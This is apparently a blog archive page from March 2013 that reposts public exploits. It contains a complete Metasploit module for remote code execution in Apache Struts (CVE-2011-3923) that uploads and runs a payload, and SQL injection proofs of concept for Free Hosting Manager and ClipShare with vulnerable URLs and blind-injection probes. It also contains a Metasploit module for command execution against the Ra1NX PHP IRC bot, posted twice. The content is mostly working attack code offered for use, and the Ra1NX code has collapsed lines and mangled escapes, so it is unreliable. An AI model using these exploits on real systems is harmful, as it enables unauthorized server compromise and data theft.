Archive for 25 Mart 2013

Apache Struts ParametersInterceptor Remote Code Execution

Apache Struts ParametersInterceptor Remote Code Execution Metasploit Exploit

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Struts ParametersInterceptor Remote Code Execution',
      'Description'    => %q{
        This module exploits a remote command execution vulnerability in Apache Struts
        versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
        for the use of parentheses which in turn allows it to interpret parameter values as
        OGNL expressions during certain exception handling for mismatched data types of
        properties which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =>
        [
          'Meder Kydyraliev', # Vulnerability Discovery and PoC
          'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
          'mihi' #ARCH_JAVA support
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-3923'],
          [ 'OSVDB', '78501'],
          [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
        ],
      'Platform'      => [ 'win', 'linux', 'java'],
      'Privileged'     => true,
      'Targets'        =>
        [
          ['Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'windows'
            }
          ],
          ['Linux Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux'
            }
          ],
          [ 'Java Universal',
            {
              'Arch' => ARCH_JAVA,
              'Platform' => 'java'
            },
          ]
        ],
      'DisclosureDate' => 'Oct 01 2011',
      'DefaultTarget' => 2))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
          OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
    ], self.class)
  end

  def execute_command(cmd, opts = {})
    inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
    inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
    inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
    inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
    uri = String.new(datastore['TARGETURI'])
    uri = normalize_uri(uri)
    uri.gsub!(/INJECT/,inject) # append the injection string
    resp = send_request_cgi({
      'uri'     => uri,
      'version' => '1.1',
      'method'  => 'GET',
    })
    return resp #Used for check function.
  end

  def exploit
    #Set up generic values.
    @payload_exe = rand_text_alphanumeric(4+rand(4))
    pl_exe = generate_payload_exe
    append = 'false'
    #Now arch specific...
    case target['Platform']
    when 'linux'
      @payload_exe = "/tmp/#{@payload_exe}"
      chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
    when 'java'
      @payload_exe << ".jar"
      pl_exe = payload.encoded_jar.pack
      exec_cmd = ""
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
      exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
      exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
      exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
      exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
      exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
      exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
    when 'windows'
      @payload_exe = "./#{@payload_exe}.exe"
      exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
    else
      fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
    end

    #Now with all the arch specific stuff set, perform the upload.
    #109 = length of command string plus the max length of append.
    sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
    chunk_length = 2048 - sub_from_chunk
    chunk_length = ((chunk_length/4).floor)*3
    while pl_exe.length > chunk_length
      java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
      pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
      append = true
    end
    java_upload_part(pl_exe,@payload_exe,append)
    execute_command(chmod_cmd) if target['Platform'] == 'linux'
    execute_command(exec_cmd)
    register_files_for_cleanup(@payload_exe)
  end

  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
    cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd << "#f.close()"
    execute_command(cmd)
  end

  def check
    sleep_time = datastore['CHECK_SLEEPTIME']
    check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
    t1 = Time.now
    print_status("Asking remote server to sleep for #{sleep_time} seconds")
    response = execute_command(check_cmd)
    t2 = Time.now
    delta = t2 - t1


    if response.nil?
      return Exploit::CheckCode::Safe
    elsif delta < sleep_time
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Appears
    end
  end

end

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injeçtion açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
Its is vulnerable to SQLi on many file some of them are..

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie based injeciton In 
http://localhost/free/clients/home.php
inject the cookie value clientuser
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
Calling a function auth() and what it is 

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only using stripslahes which will not protect against doing sql injection attack.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerable work just if there is a group added to the community 
#Last Checked: 24 March 2013

#to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  return normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  return page with some errors ( or with nothing - white page )



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
'Author' =>
[
'bwall ' # Ra1NX analysis and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
],
'Platform' => [ 'unix', 'win'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 344,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Targets' =>
[
[ 'Ra1NX', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'March 24 2013',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
], self.class)
end

def check
connect

response = register(sock)
if response =~ /463/ or response =~ /464/
print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
return Exploit::CheckCode::Unknown
end
confirm_string = rand_text_alpha(8)
response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
print response
quit(sock)
disconnect

if response =~ /#{confirm_string}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def send_msg(sock, data)
sock.put(data)
data = “”
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data < < read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg < < "PASS #{datastore['IRC_PASSWORD']}rn" end if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error(“The nick is longer than 9 characters, using #{nick}”)
else
nick = datastore['NICK']
end

msg < < "NICK #{nick}rn" msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn" response = send_msg(sock,msg) return response end def ra1nx_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye byern" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...") ra1nx_command(sock) quit(sock) disconnect end end [/sourcecode]

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: “Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => '”Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the PHP IRC bot Ra1NX by
using the public call feature in private message to covertly bypass the
authentication system.
},
'Author' =>
[
'bwall ' # Ra1NX analysis and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
],
'Platform' => [ 'unix', 'win'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 344,
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
}
},
'Targets' =>
[
[ 'Ra1NX', { } ]
],
'Privileged' => false,
'DisclosureDate' => 'March 24 2013',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(6667),
OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
], self.class)
end

def check
connect

response = register(sock)
if response =~ /463/ or response =~ /464/
print_error(“#{rhost}:#{rport} – Connection to the IRC Server not allowed”)
return Exploit::CheckCode::Unknown
end
confirm_string = rand_text_alpha(8)
response = send_msg(sock, “PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}rn”)
print response
quit(sock)
disconnect

if response =~ /#{confirm_string}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end

def send_msg(sock, data)
sock.put(data)
data = “”
begin
read_data = sock.get_once(-1, 1)
while not read_data.nil?
data < < read_data read_data = sock.get_once(-1, 1) end rescue EOFError end data end def register(sock) msg = "" if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty? msg < < "PASS #{datastore['IRC_PASSWORD']}rn" end if datastore['NICK'].length > 9
nick = rand_text_alpha(9)
print_error(“The nick is longer than 9 characters, using #{nick}”)
else
nick = datastore['NICK']
end

msg < < "NICK #{nick}rn" msg < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn" response = send_msg(sock,msg) return response end def ra1nx_command(sock) encoded = payload.encoded command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}rn" response = send_msg(sock, command_msg) return response end def quit(sock) quit_msg = "QUIT :bye byern" sock.put(quit_msg) end def exploit connect print_status("#{rhost}:#{rport} - Registering with the IRC Server...") response = register(sock) if response =~ /463/ or response =~ /464/ print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed") return end print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...") ra1nx_command(sock) quit(sock) disconnect end end [/sourcecode]